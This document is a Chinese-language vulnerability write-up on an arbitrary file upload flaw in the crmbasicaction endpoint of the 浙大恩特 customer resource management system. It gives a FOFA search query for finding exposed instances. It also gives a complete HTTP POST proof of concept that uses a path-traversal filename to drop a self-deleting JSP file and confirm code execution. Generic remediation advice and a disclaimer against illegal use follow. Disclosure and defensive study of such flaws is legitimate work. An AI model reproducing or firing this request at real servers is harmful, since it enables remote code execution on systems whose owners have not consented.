浙大恩特客户资源管理系统 crmbasicaction 任意文件上传

声明
本文仅用于技术交流，请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任

一、漏洞概述

浙大恩特客户资源管理系统中的crmbasicaction接口存在安全漏洞，允许攻击者向系统上传任意恶意JSP文件，从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。

二、fofa语法

title="欢迎使用浙大恩特客户资源管理系统" || body="script/Ent.base.js" || app="浙大恩特客户资源管理系统"

三、漏洞复现

poc

POST /entsoft/CrmBasicAction.entcrm?method=zipFileUpload&c_transModel=old HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36
Content-Length: 267
Accept-Encoding: gzip
Connection: close
Content-Type: multipart/form-data; boundary=0rwysvgvy7rxv790mpju

--0rwysvgvy7rxv790mpju
Content-Disposition: form-data; name="file"; filename="../../mqh8qxe3cy.jsp"
Content-Type: application/zip

<% out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
--0rwysvgvy7rxv790mpju--

四、修复建议?

1. 文件验证和过滤: 在接收文件上传之前，确保对文件的类型和内容进行验证和过滤。例如，使用白名单机制，只允许上传特定类型的文件，并确保验证文件的扩展名和MIME类型。

2. 文件上传路径限制: 确保文件上传的路径被限制在特定目录或目录结构下，并且不允许文件被上传到敏感目录。此外，不要允许直接通过文件名访问上传的文件。

3. 文件权限设置: 配置服务器文件系统的权限，确保上传文件的访问权限受到限制。尽量将上传的文件的权限设置为最小权限，避免其被执行或访问敏感信息。

4. 文件名的随机化: 对上传文件的文件名进行随机化处理，可以降低攻击者利用文件名进行攻击的风险。可以使用具有随机字符或哈希函数生成的唯一文件名来保存上传的文件。

5. 服务器端文件类型检查: 在服务器端对上传的文件进行进一步检查，确保文件类型与文件扩展名相匹配，以防止攻击者伪装成不同类型的文件。

6. 入侵检测系统: 安装入侵检测系统（IDS）或入侵防御系统（IPS），定期监控和扫描服务器上的文件和目录，以检测潜在的文件上传漏洞。

7. 更新和修补漏洞: 及时更新和修补使用的Web应用程序或框架，以确保不受已知的文件上传漏洞的影响。跟踪相关安全公告和更新补丁，及时更新和修复漏洞。

?